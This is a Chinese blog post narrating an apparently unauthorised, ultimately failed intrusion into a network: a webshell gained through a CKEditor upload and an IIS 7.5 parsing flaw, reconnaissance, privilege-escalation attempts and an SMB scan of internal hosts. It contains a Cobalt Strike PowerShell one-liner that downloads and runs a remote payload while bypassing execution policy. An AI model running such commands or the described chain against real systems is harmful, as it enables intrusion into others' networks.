内网练习(一)

难搞啊!!!一次失败的内网学习

入口

WebShell是通过CKEditor编辑器上传,利用IIS 7.5的解析漏洞而得到。

这个过程有些曲折

常规的信息收集

ipconfig

两张网卡,查看进程,没发现任何的杀软进程。

依次查看进程,发现是有打印机的。

getuid

net-user

权限还是挺低的其实,有些东西还查询不了,但是也不知道上图这两个命令会找不到当前用户

看了补丁时间,都为17年9月份打的,对比补丁编号,给出的建议为:

  • MS16-135
  • MS16-098
  • MS16-075
  • MS16-074
  • ….

挑着前几个来尝试。由于没见到杀软程序,所以就没考虑免杀问题,所以直接怼了。但是,很现实。

不知道什么原因,上传不免杀的exe和大马都被删除,理论上是因为杀软的存在,但是所有进程全都看过,没有!!!

——-分割线——-

还是不够细心啊。看了看还真看到了诺顿家的进程ccSvcHst.exe,这家平时接触得还是比较少,还是需要本地测试。

提权

既然存在杀软,所以先尝试Cobalt Strikepowershell远程执行(本地测试)

1
powershell.exe -nop -windowstyle hidden -exec bypass -c "IEX ((New-Object Net.WebClient).DownloadString('http://xxx.xxx.xxx.xxx:444/demo'))"

但是也没有上线,试了别的协议,也没有上线,免杀的exe也没上线,估计是异常链接被拦截吧。

那还是老老实实先提权吧。

试了建议的exp,发现没什么效果。那就寻找别的突破口。后面发现,利用MS17-010是可以的,但是。。

内网拓展

接下来为一些常规的内网扫描。

arp

1
2
3
4
5
6
7
8
9
10
11
[+] 10.0.0.48:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:0xxxx) (workgroup:WORKGROUP )
[+] 10.0.0.22:445 - Host is running Windows 2012 R2 Standard (build:9600) (name:INSExxxx)
[*] 192.168.1.15:139 - Host could not be identified: ()
[+] 192.168.1.12:445 - Host is running Windows 2008 Enterprise SP2 (build:6002) (name:0xxxx) (domain:Bxxxx)
[+] 192.168.1.19:445 - Host is running Windows 10 Enterprise (build:10240) (name:DxxxxP-85PCF8N) (workgroup:WORKGROUP )
[+] 192.168.1.14:445 - Host is running Windows 2008 R2 Standard SP1 (build:7601) (name:0xxxx) (workgroup:WORKGROUP )
[+] 192.168.1.11:445 - Host is running Windows 2003 SP2 (build:3790) (name:0xxxx) (domain:Bxxxx)
[+] 192.168.1.32:445 - Host is running Windows 7 Ultimate SP1 (build:7601) (name:Pxxxx) (domain:Bxxxx)
[*] 192.168.1.88:445 - Host could not be identified: ()
[+] 192.168.1.66:445 - Host is running Windows 7 Ultimate SP1 (build:7601) (name:TRINHMxxxx) (domain:Bxxxx)

吃个饭回来不行了,各种杀,完蛋。

当然还有别的办法,如果后续有进度再更新。。

!坚持技术分享,您的支持将鼓励我继续创作!